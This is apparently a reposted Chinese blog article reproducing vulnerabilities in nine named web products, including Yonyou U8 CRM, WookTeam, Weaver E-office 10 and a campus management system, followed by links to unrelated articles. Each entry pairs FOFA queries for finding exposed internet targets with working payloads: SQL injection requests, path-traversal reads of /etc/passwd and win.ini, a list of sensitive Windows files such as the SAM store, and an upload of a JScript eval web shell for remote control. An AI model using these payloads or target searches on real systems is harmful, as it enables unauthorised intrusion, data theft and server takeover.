护网漏洞复现(三)

news/2024/11/15 6:38:57/文章来源:https://www.cnblogs.com/LeouMaster/p/18395857

Mtab书签导航程序LinkStoregetlcon存在SQL注入漏洞

描述:Mtab书签导航程序 LinkStore/getIcon 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限

fofa语法:title="Mtab书签"

POC:

POST /LinkStore/getIcon HTTP/2

Host: xxx.xxx.xxx.xxx

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36

Content-Type: application/json

Content-Length: 11

{"url":"*"}

漏洞复现:

fofa中搜索资产,共有215条数据匹配

屏幕上有字  描述已自动生成

以下是页面访问特征

电脑萤幕画面  描述已自动生成

访问http://xxx.xxx.xxx.xxx/LinkStore/getlcon

图形用户界面, 应用程序  描述已自动生成

当前页面抓包,修改GET请求为POST请求

文本  描述已自动生成

将数据包放入到sqlmap中进行测试,漏洞存在

文本  描述已自动生成

用友CRM客户关系管理help.php存在任意文件读取漏洞

描述:用友U8 CRM是一款针对代理销售服务行业设计的管理软件,它集客户关系管理(CRM)、呼叫中心和自动化(OA)核心应用于一体,提供前端营销、后端业务处理及员工管理的一体化解决方案。该系统的help.php文件中接口存在任意文件读取漏洞,攻击者在未登录的情况下即可进行漏洞利用。

fofa语法:body="用友 U8CRM"

POC:http://xxx.xxx.xxx.xxx/pub/help.php?key=YTozOntpOjA7czoyNDoiLy4uLy4uLy4uL2FwYWNoZS9waHAuaW5pIjtpOjE7czoxOiIxIjtpOjI7czoxOiIyIjt9

漏洞复现:

fofa中所搜资产,共有1314条数据匹配

图形用户界面, 应用程序  描述已自动生成

以下为登录页面以及页面特征

图形用户界面, 应用程序, Teams  描述已自动生成

在url后面添加Payload

文本  中度可信度描述已自动生成

在这个也买你查找error_log可以看到此系统的安装路径,如果是C盘,可以查看更多敏感信息

图片包含 背景图案  描述已自动生成

URL中key的内容是经过base64加密的,原本为以下内容

a:3:{i:0;s:24:"/../../../apache/php.ini";i:1;s:1:"1";i:2;s:1:"2";}

如果直接在URL中拼接以上内容是无法进行文件读取的

以下是一些常用的敏感windows文件路径

C:\boot.ini //查看系统版本

C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件

C:\Windows\repair\sam //存储系统初次安装的密码

C:\Program Files\mysql\my.ini //Mysql配置

C:\Program Files\mysql\data\mysql\user.MYD //Mysql root

C:\Windows\php.ini //php配置信息

C:\Windows\my.ini //Mysql配置信息

C:\Windows\win.ini //Windows系统的一个基本系统配置文件

WookTeam轻量级的团队在线协作系统接口searchinfo存在SQL注入漏洞

描述:WookTeam /api/users/serchinfo接口存在SQL注入漏洞,未经身份验证的恶意攻击者可以利用SQL注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)等,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限

fofa语法:title="Wookteam"

POC:

http://xxx.xxx.xxx.xxx/api/users/searchinfo?where[username]=1') UNION ALL SELECT NULL,CONCAT(0x71627a7a71,0x6a4e626c59524676474f4d446d666c50475265514a7879586f6b4271584365526678617575704f72,0x7162707671),NULL,NULL,NULL#

漏洞复现:

fofa中搜索资产,共有673条数据匹配

图形用户界面  描述已自动生成

以下为登录页面以及页面特征

图形用户界面  描述已自动生成

访问/api/users/searchinfo接口,会显示当前系统中存在哪些用户

文本  描述已自动生成

构造Payload,在url后面添加单引号发现报错了,很明显存在SQL注入漏洞

图形用户界面, 应用程序, Word  描述已自动生成

将URL放入到sqlmap中进行测试

文本  描述已自动生成

智慧校园(安校易)管理系统存在文件上传漏洞

描述:智慧校园(安校易—)管理系统/Tool/ReceiveClassVideo.ashx接口存在任意文件上传漏洞,攻击者可通过该漏洞上传任意文件到服务器上,包括木马后门文件,导致服务器权限被控制。

fofa语法:title="智慧综合管理平台登入"

POC:

POST /Tool/ReceiveClassVideo.ashx?file_tmid=798&orgid=1&classID=1 HTTP/1.1

Host: xxx.xxx.xxx.xxx

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0

Content-Length: 374

Accept: application/json, text/javascript, /; q=0.01

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,

Connection: close

Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl

X-Requested-With: XMLHttpRequest

Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl

Content-Disposition: form-data; name="File1"; filename="1.aspx"

Content-Type: image/jpeg

<%@ Page Language="Jscript" validateRequest="false" %>

<%

function xxxx(str)

{

​ return eval(str,"unsafe");

}

%>

<%var a = Request.Item["pass"];%>

<%var b = xxxx(a);%>

<%Response.Write(b);%>

------dqdaieopnozbkapjacdbdthlvtlyl--

漏洞复现:

fofa搜索资产,共有134条数据匹配

图形用户界面  描述已自动生成

以下为登陆页面以及页面特征

图形用户界面, 网站  描述已自动生成

当前页面抓包构造数据包

图形用户界面, 文本, 应用程序  描述已自动生成

返回内容报错可以不用管,但是我尝试了其他的系统只有报“保存班级视频表失败”的错误才成功

使用蚁剑进行连接

图形用户界面, 应用程序  描述已自动生成

连接成功后目标不存在域环境

图形用户界面  描述已自动生成

泛微E-office 10 schema_mysql接口敏感信息泄露漏洞

描述:泛微E-Office 10是一款企业级办公自动化系统,主要用于优化和管理企业的文档、信息流转、协作与沟通工作流程。该系统的schema_mysql接口存在敏感信息泄露漏洞。

fofa语法:body="eoffice_loading_tip" && body="eoffice10"

POC:http://xxx.xxx.xxx.xxx/eoffice10/empty_scene/db/schema_mysql.sql

漏洞复现:

fofa搜索资产,共有4868条数据匹配

电脑的屏幕截图  描述已自动生成

以下为登陆页面以及页面特征

建筑的摆设布局  描述已自动生成

当前页面抓包构造Payload

图形用户界面, 文本, 应用程序  描述已自动生成

AVCON-系统管理平台download.action存在任意文件读取漏洞

描述:AVCON-系统管理平台download.action存在任意文件读取漏洞,攻击者可通过该漏洞读取配置文件信息,造成信息泄露漏洞。

fofa语法:title="AVCON-系统管理平台"

POC:http://xxx.xxx.xxx.xxx/download.action?filename=../../../../../../../../etc/passwd

漏洞复现:

fofa搜索资产,共有50条资产匹配

背景图案  中度可信度描述已自动生成

以下为登录页面以及页面特征

图形用户界面  描述已自动生成

当前页面抓包构造payload

文本  描述已自动生成

图形用户界面, 文本  描述已自动生成

智互联(深圳)科技有限公司SRM智联云采系统download存在任意文件读取漏洞

描述:智联云采是一款针对企业供应链管理难题及智能化转型升级需求而设计的解决方案,智联云采依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,进而规避供需风险,强化供应链整合能力,构建企业利益共同体。该系统SRM2.0 runtimeLog/download接口存在任意文件读取漏洞,未经身份验证的远程攻击者可以通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)等,导致网站处于极度不安全状态。

fofa语法:title=="SRM 2.0"

POC:http://xx.xx.xx.xx/adpweb/static/..;/a/sys/runtimeLog/download?path=c:\windows\win.ini

漏洞复现:

fofa搜索资产,共有744条数据匹配图形用户界面, 应用程序  描述已自动生成以下是登陆页面以及页面特征

电脑萤幕画面  描述已自动生成

当前页面抓包,构造payload

图形用户界面, 文本, 应用程序, 电子邮件  描述已自动生成

科荣AIO管理系统endTime参数存在SQL注入漏洞

描述:科荣AIO endTime接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(如:管理员后台密码、站点用户个人信息)之外,甚至在高权限的情况下可以向服务器中写入木马,进一步获取服务器系统权限。

fofa语法:body="changeAccount('8000')"

POC:http://xx.xx.xx.xx/moffice?op=showWorkPlanList&type=1&beginTime=1&endTime=1*&sid=1

漏洞复现:

fofa搜索资产,共有1611条数据匹配屏幕上有字  描述已自动生成

以下为登录页面以及页面特征

图形用户界面  描述已自动生成

构造payload访问

img

从返回结果看是存在查询操作,可能与数据库有交互

放入到sqlmap中进行测试

文本  描述已自动生成

安美数字酒店宽带运营系统weather.php任意文件读取漏洞

描述:安美数字酒店宽带运营胸痛weather.php接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件,导致网站处于极度不安全状态。

fofa语法:app="安美数字-酒店宽带运营系统"

POC:http://xx.xx.xx.xx/user/weather.php?Lang=../../../etc/passwd

漏洞复现:

fofa搜索资产,共有19条数据匹配

电脑萤幕画面  描述已自动生成

以下为登录页面以及页面特征

图形用户界面, 应用程序  描述已自动生成

构造payload拼接到url后面

img

图形用户界面, 文本, 应用程序  描述已自动生成

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/791974.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

360安全卫士极速版,如何查找恢复区,隔离区,信任区

我已经使用360安全卫士极速版已经2年时间,在个人使用感受上,说实话我觉得很不错,至少没有广告。如果有朋友是360安全卫士的使用者,我推荐你们使用安全极速版 界面更加清晰,简洁,好用。很多功能都没有删减,可以说是保留360安全卫士的核心功能 下载地址:360官网_360安全卫…

Jmeter 4.0压力测试工具安装及使用方法

一、Jmeter下载 1.网盘(官网下载贼慢):https://pan.xunlei.com/s/VO5ucfHW9SkAXN8Ns-a5oxoQA1?pwd=y4aw# 2.选择进行下载,下载下来为一个压缩包,解压即可。3.我下载的是jmeter4.0版本,对应jdk1.8。然后就进行解压。 个人认为要注意2点: 1)对应的jdk版本不可太低,一般jm…

遇见资深育儿专家智能体,开启无忧育儿之旅

本文由 ChatMoney团队出品介绍说明 在育儿的道路上,您是否常常感到迷茫和无助?面对孩子的成长问题、教育难题以及各种突发状况,您是否渴望有一位专业的导师为您指引方向?现在,让资深育儿专家智能体成为您育儿路上的得力助手,为您解锁育儿密码,告别养育迷茫! 资深育儿专…

LoRA大模型微调的利器

LoRA模型是小型的Stable Diffusion模型,它们对checkpoint模型进行微小的调整。它们的体积通常是检查点模型的10到100分之一。因为体积小,效果好,所以lora模型的使用程度比较高。LoRA模型是小型的Stable Diffusion模型,它们对checkpoint模型进行微小的调整。它们的体积通常是…

Linux服务器之TOP命令详解

在做性能调优的过程中,我们经常需要用到top命令来查看服务器实时的资源占用情况,通过top命令,我们可以查看到服务器的各项性能指标以及各个进行的资源使用情况。 命令格式:top [参数]命令参数:-b 批处理-c 显示完整的治命令-I 忽略失效过程-s 保密模式-S 累积模式-i<时…

护网漏洞复现(一)

金程云OA UploadFile存在任意文件上传漏洞 描述:金程云OA UploadFile存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。 fofa语法:body="images/yipeoplehover.png" POC: POST …

LLM大模型基础知识学习总结

在这个已经被大模型包围的时代,不了解一点大模型的基础知识和相关概念,可能出去聊天都接不上话。刚好近期我也一直在用GPT和GitHub Copilot,也刚好对这些基础知识很感兴趣,于是学习了一下,做了如下的整理总结,分享与你!大家好,我是Edison。 在这个已经被大模型包围的时…

借助表格技术提升智能审计云平台应用体验

背景说明: 2009年,立信加入全球第五大国际会计网络——BDO国际。BDO 全球各地成员所均使用统一的审计方式,在完全遵守国际审计准则的原则同时,也会应不同地区要求提供附加指引,确保在全球提供一致的服务水平。如今,立信的审计过程及档案记录均已实现电子化。然而,审计工…

芯片电源入口VCC串联的小电阻

芯片电源入口VCC串联的小电阻 我们经常会看到,在一些芯片的电源入口处不是直接接入直流电源,而是在VCC入口串联一个几十欧姆的小电阻,这个电阻有什么作用呢? 示意图如下具体分析: 1.假设没有这个电阻R1,当芯片击穿后,芯片内部的VCC引脚跟GND短路,VCC引脚又直接跟电源15V…

高端制造业供应商伙伴管理的痛点是什么?怎么解决?

高端制造业供应商伙伴管理一般都会选择使用供应商管理系统(SRM, Supplier Relationship Management)来改善企业与供应链上游供应商的关系,提高采购效率,降低采购成本,并增强供应链的透明度和合规性。而SRM系统在一定程度上可以满足供应商伙伴管理的基础诉求,如供应商信息…

备受500强企业青睐的安全数据交换系统,到底有什么优势?

网络隔离成为常见的安全手段 网络隔离技术已成为许多企业进行网络安全建设的重要手段之一,党政单位、金融机构、半导体企业、以及能源电力、医疗、生物制药等等行业及领域的企业都会选择方式不一的网络隔离技术来保护自己的网络安全,规避互联网中的网络侵害。 网络隔离为企业…

DAG 求u到v路径数

DAG 求u到v的路径数先拓扑排序求出每个点的顺序,再对每个起点 \(s\) 做 dp,遍历拓扑序的点,对 \(s\) 能到达的点做 dp 统计路径数,如果终点 \(t\) 拓扑序在 \(s\) 之前就说明没有路径。 #include<bits/stdc++.h> using namespace std; #define ll long long #define …